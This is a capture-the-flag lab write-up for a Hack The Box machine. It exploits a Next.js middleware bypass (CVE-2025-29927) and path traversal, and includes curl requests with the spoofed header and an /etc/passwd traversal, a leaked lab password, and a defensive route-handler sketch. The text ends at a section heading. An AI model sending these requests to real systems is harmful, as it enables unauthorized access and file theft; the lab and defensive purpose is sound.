Previous

Platform: Hack The Box

Season: 9

Difficulty: Medium

OS: Linux

Date: 2025-11-07

Author: x4cc3


Executive Summary

Previous is a Medium Linux machine running a Next.js web application. CVE-2025-29927 (a middleware bypass) allows unauthorized access to /api/download, whose example parameter is vulnerable to path traversal. The resulting LFI leaks the NextAuth configuration, which contains the hardcoded credentials jeremy:MyNameIsJeremyAndILovePancakes. After logging in over SSH, the sudo configuration shows terraform allowed with !env_reset, so TF_CLI_CONFIG_FILE can be hijacked to execute a malicious provider binary as root.

Recon — Port Scan

rustscan -a 10.10.11.83
22/tcp SSH
80/tcp HTTP — Next.js

Exploitation

CVE-2025-29927 — Next.js Middleware Bypass

Landing page

curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" "http://previous.htb/docs"

The middleware bypass revealed a path traversal via /api/download?example=:

curl -H "x-middleware-subrequest: middleware:..." "http://previous.htb/api/download?example=../../../etc/passwd"
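From the defender's side, both requests above fail if the route handler rejects the internal header, re-checks the session itself and confines the example value to one directory. The sketch below is an added example, not code from the target application; EXAMPLES_DIR, the session shape and the file names are assumptions.

```javascript
// Added example (not the application's code). Directory, session shape and
// file names are assumptions made for illustration.
const INTERNAL_HEADER = "x-middleware-subrequest";
const EXAMPLES_DIR = "/app/examples"; // assumed download root

// Case-insensitive header lookup; Node lowercases names, proxies may not.
function hasHeader(headers, name) {
  return Object.keys(headers || {}).some((k) => k.toLowerCase() === name);
}

// Map the `example` query value (already URL-decoded by the framework) to a
// path under EXAMPLES_DIR, or null if it could leave that directory.
function resolveExample(name) {
  if (typeof name !== "string" || name === "") return null;
  if (name.includes("\0") || name.includes("\\") || name.startsWith("/")) return null;
  const segments = name.split("/");
  if (segments.some((s) => s === "" || s === "." || s === "..")) return null;
  return EXAMPLES_DIR + "/" + segments.join("/");
}

// Decision the route handler makes itself, instead of trusting middleware.
function authorizeDownload(req) {
  // The header is internal to Next.js; a client-supplied copy is rejected.
  if (hasHeader(req.headers, INTERNAL_HEADER)) return { status: 400 };
  // Authentication is re-checked here, so skipping middleware gains nothing.
  if (!req.session || !req.session.user) return { status: 401 };
  const file = resolveExample(req.query.example);
  return file ? { status: 200, file } : { status: 400 };
}

// Constructed requests modelled on the two curl commands above.
const samples = [
  { headers: { "X-Middleware-Subrequest": "middleware:middleware" },
    query: { example: "../../../etc/passwd" } },
  { headers: {}, query: { example: "../../../etc/passwd" } },
  { headers: {}, session: { user: "alice" }, query: { example: "../../../etc/passwd" } },
  { headers: {}, session: { user: "alice" }, query: { example: "hello-world.ts" } },
];
for (const r of samples) console.log(authorizeDownload(r));
```

If the download directory can contain symlinks, the handler should also compare the fs.realpath result of the file against that of the directory before serving it.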

Credential Leak via LFI